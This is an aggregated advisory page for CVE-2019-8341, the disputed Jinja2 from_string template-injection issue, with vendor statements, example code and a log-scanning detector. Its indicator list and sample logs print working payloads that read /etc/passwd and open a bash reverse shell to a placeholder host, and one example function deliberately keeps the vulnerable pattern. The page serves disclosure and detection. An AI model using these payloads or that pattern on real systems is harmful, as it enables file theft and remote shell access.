CVE-2019-8341
Published 2019-02-15
Priority P2 · 75 · critical 9.8 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 44.78% (98.6th percentile)
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.
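The misuse the description refers to, shown as an added example that is not from the advisory, the PoC or the Jinja2 project: user input concatenated into the source handed to from_string() (the vulnerable pattern), the same call under SandboxedEnvironment (which refuses the __class__ hop but still evaluates template expressions), and the correct form where user data is a render variable and never part of the template source. The render_* function names, the sample username values and the probe() helper are assumptions for illustration.

```python
"""Jinja2 from_string: user input as template *source* versus as a render variable.

Added example; not code from the advisory, the PoC or the Jinja2 project.
"""
import html

from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed sample values for a hypothetical ?username= parameter (assumptions).
BENIGN = "alice"
PROBE = "{{ 7*7 }}"                        # classic SSTI probe: renders as 49 if evaluated
CLASS_WALK = "{{ ''.__class__.__mro__ }}"  # first hop of the __subclasses__() traversal chain


def render_vulnerable(username: str) -> str:
    """The CVE's pattern: request data is concatenated into the template source and
    passed to from_string(), so any {{ }} in the input is parsed and evaluated."""
    env = Environment()
    return env.from_string("Hello " + username).render()


def render_sandboxed(username: str) -> str:
    """Same misuse under SandboxedEnvironment: access to underscore-prefixed attributes
    raises SecurityError, but the input is still compiled and run as template code."""
    env = SandboxedEnvironment()
    return env.from_string("Hello " + username).render()


def render_safe(username: str) -> str:
    """Correct usage: the template is a fixed string and user data is a render variable.
    Nothing in the data is ever parsed as template syntax; autoescape handles HTML."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ username }}").render(username=username)


def probe(render, value: str) -> str:
    """Classify how a renderer treats a value: 'evaluated', 'blocked' or 'literal'.
    html.unescape() undoes autoescaping so a literal echo is recognised as such."""
    try:
        out = render(value)
    except SecurityError:
        return "blocked"
    return "literal" if value in html.unescape(out) else "evaluated"


if __name__ == "__main__":
    renderers = [("vulnerable", render_vulnerable),
                 ("sandboxed", render_sandboxed),
                 ("safe", render_safe)]
    for name, fn in renderers:
        print(f"{name:10s} probe={probe(fn, PROBE):9s} class_walk={probe(fn, CLASS_WALK)}")
```

Run it with jinja2 installed. Treat the sandbox as defence in depth rather than a fix: it stops the __class__ walk with a SecurityError, yet {{ 7*7 }} still renders as 49, so untrusted input can still drive arbitrary template logic, loops and resource use. Only passing the data as a render variable removes the injection entirely, and autoescape then also neutralises HTML in the value.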
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | jinja2 | — | — |
| opensuse | leap | — | — |
| opensuse | leap | — | — |
| pocoo | jinja2 | — | — |
Detection & IOCs (extracted from sources)
- url: http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
- url: http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
- Detect SSTI payloads in HTTP query parameters by looking for Jinja2 template expression delimiters {{ }} (and statement delimiters {% %}) in URI/request values, particularly in parameters like 'username'. Decode percent-encoding before matching: a browser or curl sends {{ as %7B%7B.
- Monitor for Python MRO/subclass traversal patterns in HTTP parameters indicative of SSTI exploitation: ''.__class__.__mro__[2].__subclasses__()[40]. Match on the names (__class__, __mro__, __subclasses__) rather than on the indices: [2] and [40] come from the PoC's interpreter, str's MRO has only two entries on Python 3, and real payloads vary the indices freely.
- Detect reverse shell attempts via Jinja2 SSTI using config['RUNCMD'] with bash TCP redirection (/dev/tcp/) in template injection payloads. config['RUNCMD'] is specific to the PoC application, which stores a command-execution callable under that config key; Flask defines no such key, so the bash redirection is the more general indicator.
- Flag use of Jinja2 from_string() (or Flask's render_template_string(), which calls it) where the 'source' parameter is derived from user-controlled input (e.g., request.values.get()) without sandboxing; this is the vulnerable code pattern.
- This CVE is disputed by the Jinja2 maintainers (the Pallets project) and by vendors such as Red Hat. The behavior is considered expected/by-design: Jinja2 does not guarantee safe handling of untrusted templates without sandboxing enabled. No patch exists or is planned.
- Red Hat explicitly assessed all their products as 'Not affected' and considers the CVE assignment invalid.
- Jinja2 maintainers submitted a REJECT request to MITRE; the CVE status is disputed. Detection rules targeting this CVE should be scoped to application-level misuse, not a framework vulnerability.
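The four detection hints above as running code, added here and not part of any source cited on this page: the scanner reads combined-format access-log lines (constructed samples, not real traffic), decodes every query parameter, applies one regex per hint and reports which rule fired on which parameter. It generalises the hints to every parameter rather than only username, and it handles percent-encoded and double-encoded payloads. The rule names, the log lines and the 192.0.2.10 address are assumptions for illustration.

```python
"""Flag Jinja2 SSTI probes in HTTP access-log query parameters.

Added example; not code from the advisory or any source cited on the page.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (combined-log style; not real traffic).
# Lines 2-4 carry the page's payloads percent-encoded as a browser or curl would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2019:10:01:02 +0000] "GET /?username=alice HTTP/1.1" 200 512
10.0.0.7 - - [15/Feb/2019:10:01:09 +0000] "GET /?username=%7B%7B%207*7%20%7D%7D HTTP/1.1" 200 512
10.0.0.9 - - [15/Feb/2019:10:02:31 +0000] "GET /?username=%7B%7B%20%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%5B40%5D%28%27/etc/passwd%27%29.read%28%29%20%7D%7D HTTP/1.1" 200 2048
10.0.0.9 - - [15/Feb/2019:10:03:00 +0000] "GET /?username=%7B%7B%20config%5B%27RUNCMD%27%5D%28%27bash%20-i%20%3E%26%20/dev/tcp/192.0.2.10/8000%200%3E%261%27%2Cshell%3DTrue%29%20%7D%7D HTTP/1.1" 200 512
10.0.0.11 - - [15/Feb/2019:10:04:00 +0000] "GET /search?q=%7Bjson%7D&page=2 HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Each rule is matched independently against every decoded parameter value.
# Match on the traversal *names*, not the [2]/[40] indices: those shift between
# Python versions and builds (str's MRO has two entries on Python 3, three on Python 2).
RULES = [
    ("jinja2_delimiters", re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)),
    ("python_class_traversal",
     re.compile(r"__(?:class|mro|base|subclasses|globals|builtins|import)__")),
    ("reverse_shell_redirect", re.compile(r"/dev/tcp/|\bbash\s+-i\b|\bnc\b[^\n]*\s-e\s")),
]


def query_params(target: str):
    """Decode the request target's query string into (name, value) pairs."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_line(line: str):
    """Return sorted (rule, parameter) hits for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = set()
    for name, value in query_params(m.group("target")):
        # parse_qsl already decoded once; a second pass catches double-encoded payloads.
        candidates = (value, unquote_plus(value))
        for rule, pattern in RULES:
            if any(pattern.search(c) for c in candidates):
                hits.add((rule, name))
    return sorted(hits)


def scan_log(text: str):
    """Return [(line_number, hits)] for every line that triggers at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: " + ", ".join(f"{rule} in ?{param}" for rule, param in hits))
```

Line 5 of the sample, a single-brace {json} value, deliberately produces no hit: the delimiter rule requires a full {{ }} or {% %} pair, which keeps JSON-in-query traffic out of the alert stream. Because the CVE is disputed, treat a hit as evidence of an application accepting template source from the request, and scope any resulting rule to that application rather than to the library.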
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | LOW | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
GHSA
GHSA-f6pv-j8mr-w6rr (ghsa_unreviewed · 2022-05-13) · CVE-2019-8341 · CRITICAL · CWE-94
** DISPUTED ** An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.
OSV
CVE-2019-8341 (osv · 2019-02-15 · CVSS 9.8 · CRITICAL)
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.
Red Hat
python-jinja2: command injection in function from_string (vendor_redhat · 2019-02-14 · CVSS 9.8 · CRITICAL · CWE-77)
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.
Statement: Red Hat Product Security does not believe this CVE assignment is valid. To the best of our knowledge, Jinja2 does not make any guarantees about being able to safely handle untrusted data by default without sandboxing modes enabled.
Package: python-jinja2 (Red Hat Ceph Storage 2) - Not affected
Debian
CVE-2019-8341: jinja2 (vendor_debian · 2019 · CVSS 9.8 · CRITICAL)
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
No detection rules found.
Bugzilla
CVE-2019-8341 python-jinja2: command injection in function from_string [fedora-all] (bugzilla · 2019-02-15 · CVSS 9.8 · CRITICAL)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2019-8341 python-jinja2: command injection in function from_string [epel-all] (bugzilla · 2019-02-15 · CVSS 9.8 · CRITICAL)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versio
Bugzilla
CVE-2019-8341 python-jinja2: command injection in function from_string (bugzilla · 2019-02-15 · CVSS 9.8 · CRITICAL)
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI.
Reference:
https://github.com/JameelNabbo/Jinja2-Code-execution
Discussion:
Created python-jinja2 tracking bugs for this issue:
Affects: epel-all [bug 1677655]
Affects: fedora-all [bug 1677654]
---
After a quick glance, this CVE doesn't seem valid. If you let a user inject data into an unsafe function, they can do unsafe operations. I'm trying to find this documented in jinja2. They do support sandboxing, so it seems like they're aware of it.
References:
- http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.html
- http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.html
- https://bugzilla.redhat.com/show_bug.cgi?id=1677653
- https://bugzilla.suse.com/show_bug.cgi?id=1125815
- https://github.com/JameelNabbo/Jinja2-Code-execution
- https://www.exploit-db.com/exploits/46386/